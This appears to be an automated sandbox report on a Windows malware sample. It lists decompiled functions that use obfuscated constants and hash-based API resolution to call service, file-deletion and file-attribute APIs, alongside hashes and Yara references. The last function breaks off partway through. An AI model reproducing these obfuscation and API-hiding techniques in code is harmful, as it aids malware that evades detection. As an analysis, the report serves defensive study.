                                              • Instruction ID: 0e41601c5170870fff14c69e3aeec768b21d7b82c6e0726c682f4726547fb5ef
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: D2014FB190120CFFEB09DFA4D84A8DEBBB5EF44314F108198F40567240E6B15F609B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E0022F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                              0x0022f662
                                              0x0022f663
                                              0x0022f665
                                              0x0022f668
                                              0x0022f66a
                                              0x0022f66d
                                              0x0022f670
                                              0x0022f673
                                              0x0022f677
                                              0x0022f678
                                              0x0022f67d
                                              0x0022f687
                                              0x0022f693
                                              0x0022f69a
                                              0x0022f6a1
                                              0x0022f6a5
                                              0x0022f6a9
                                              0x0022f6b0
                                              0x0022f6c9
                                              0x0022f6d8
                                              0x0022f6de

                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0022F6D8
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: c219bc23b31abedc45fcf728708936782f9d9bba77c4ca36990c459a2553eb13
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25F21EBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0022B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0022602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                              0x0022b6f3
                                              0x0022b6f8
                                              0x0022b702
                                              0x0022b70b
                                              0x0022b712
                                              0x0022b719
                                              0x0022b720
                                              0x0022b727
                                              0x0022b72e
                                              0x0022b747
                                              0x0022b759
                                              0x0022b75e

                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0022B759
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: 805ceceae2d365355b6515513bd125146e4d87094100ab013cfcd0affd305b92
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 99012CB6951308FBEB45DF94DD06A9E7BB5EB14704F108188FA0566190D3B15A20AB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0023AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                              0x0023aa3f
                                              0x0023aa40
                                              0x0023aa41
                                              0x0023aa44
                                              0x0023aa47
                                              0x0023aa4b
                                              0x0023aa4c
                                              0x0023aa51
                                              0x0023aa5b
                                              0x0023aa64
                                              0x0023aa68
                                              0x0023aa6f
                                              0x0023aa76
                                              0x0023aa8d
                                              0x0023aa90
                                              0x0023aa9d
                                              0x0023aaa8
                                              0x0023aaad

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0023AAA8
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 1000745A, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 25%
                                              			E1000745A() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                              0x1000745a
                                              0x1000745c
                                              0x1000745e
                                              0x10007460
                                              0x10007468

                                              APIs
                                              • _doexit.LIBCMT ref: 10007460
                                                • Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
                                                • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
                                                • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
                                                • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
                                                • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                              • String ID:
                                              • API String ID: 3712619029-0
                                              • Opcode ID: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                              • Instruction ID: 3ec830fb80d18a678ff5eda6f0b3b9b2a61aba64271b485974690d1bc54d2aa8
                                              • Opcode Fuzzy Hash: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                              • Instruction Fuzzy Hash: 5EA00269FD470071F86095502C43F9421017764F42FD44050BB0D2C1C5F4DE62584157
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00229FDC, Relevance: 39.5, Strings: 31, Instructions: 734COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00229FDC(void* __edx) {
				void* __edi;
				signed int _t751;
				void* _t787;
				signed char** _t788;
				signed char** _t790;
				signed char** _t793;
				signed char** _t799;
				short _t803;
				signed int _t804;
				signed int _t805;
				void* _t806;
				signed int _t809;
				signed int _t817;
				signed int _t820;
				signed int _t832;
				signed int _t836;
				signed int _t903;
				intOrPtr* _t917;
				short* _t918;
				short* _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t945;
				signed int _t946;
				signed int _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t954;
				void* _t955;

				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(_t917);
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(__edx);
				_push(1);
				E0022602B(1);
				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
				_t950 = _t949 + 0x1c;
				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
				_t946 = 0;
				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
				_t806 = 0x2ca20b85;
				 *(_t950 + 0x9c) = 0xada2;
				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
				_t920 = 0x73;
				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
				 *(_t950 + 0x98) = 0x829e;
				_t921 = 0x5b;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
				 *(_t950 + 0x7c) = 0xdccb;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
				 *(_t950 + 0xb4) = 0xef7d;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
				 *(_t950 + 0xe8) = 0xccb1;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
				 *(_t950 + 0x74) = 0xc511;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
				_t922 = 0x69;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
				 *(_t950 + 0xa4) = 0x943d;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
				 *(_t950 + 0x114) = 0x676a;
				_t923 = 0xb;
				 *(_t950 + 0x130) = 0;
				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
				 *(_t950 + 0x4c) = 0x9f6f;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
				 *(_t950 + 0x44) = 0xfa80;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
				 *(_t950 + 0xec) = 0x5cda;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
				 *(_t950 + 0x2c) = 0x6ba5;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
				 *(_t950 + 0xb4) = 0xc1db;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
				 *(_t950 + 0xf0) = 0xa853;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
				 *(_t950 + 0xe8) = 0x787f;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
				 *(_t950 + 0xa8) = 0xf94e;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
				 *(_t950 + 0x118) = 0x6b15;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
				 *(_t950 + 0x10c) = 0x9660;
				_t804 = 0x3f;
				_t924 = 0x1c;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
				 *(_t950 + 0x8c) = 0x9ebc;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
				 *(_t950 + 0x124) = 0x986;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
				 *(_t950 + 0x84) = 0x3532;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
				 *(_t950 + 0xa4) = 0x41f;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
				 *(_t950 + 0x108) = 0x3cbe;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
				 *(_t950 + 0x68) = 0xe725;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
				 *(_t950 + 0xb8) = 0xbf58;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
				 *(_t950 + 0x100) = 0xd5da;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
				 *(_t950 + 0x54) = 0x395a;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
				 *(_t950 + 0xd4) = 0x77ed;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
				 *(_t950 + 0x114) = 0x68ca;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
				 *(_t950 + 0xdc) = 0x2f2e;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
				 *(_t950 + 0x24) = 0x5bdf;
				_t925 = 0xa;
				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
				_t926 = 0x47;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
				 *(_t950 + 0x40) = 0xbbeb;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
				 *(_t950 + 0xb0) = 0x7d23;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
				 *(_t950 + 0x60) = 0xae03;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
				 *(_t950 + 0xe4) = 0xc6a2;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
				 *(_t950 + 0x5c) = 0xaf00;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
				 *(_t950 + 0x24) = 0xf54a;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
				 *(_t950 + 0x124) = 0xcc46;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
				 *(_t950 + 0x12c) = 0x5a4b;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
				 *(_t950 + 0x34) = 0x6135;
				_t927 = 0xf;
				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
				 *(_t950 + 0xfc) = 0x664c;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
				 *(_t950 + 0x7c) = 0x54c3;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
				 *(_t950 + 0x28) = 0x1122;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
				 *(_t950 + 0x40) = 0x14c1;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
				_t928 = 0x27;
				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
				 *(_t950 + 0x3c) = 0x8f59;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
				_t929 = 7;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
				_t930 = 0x30;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
				 *(_t950 + 0x108) = 0x8114;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
				 *(_t950 + 0x68) = 0x1eec;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
				 *(_t950 + 0x64) = 0x2753;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
				 *(_t950 + 0x1c) = 0xf5b7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
				 *(_t950 + 0x38) = 0x2f43;
				_t931 = 0x4b;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
				_t932 = 0x3a;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
				 *(_t950 + 0xf8) = 0xec82;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
				 *(_t950 + 0x94) = 0xef51;
				_t933 = 0x32;
				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
				_t934 = 0x11;
				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
				 *(_t950 + 0xc8) = 0xb312;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
				 *(_t950 + 0x98) = 0x3fa5;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
				 *(_t950 + 0x50) = 0xcffd;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
				 *(_t950 + 0xd8) = 0x2cbc;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
				 *(_t950 + 0x48) = 0xee7b;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
				 *(_t950 + 0xd0) = 0xc42e;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
				 *(_t950 + 0xcc) = 0xa2cf;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
				 *(_t950 + 0x11c) = 0xb9db;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
				 *(_t950 + 0x88) = 0xfaa3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
				 *(_t950 + 0xc0) = 0xa294;
				_t935 = 0x7e;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
				 *(_t950 + 0x80) = 0xa0b2;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
				 *(_t950 + 0x74) = 0x61f;
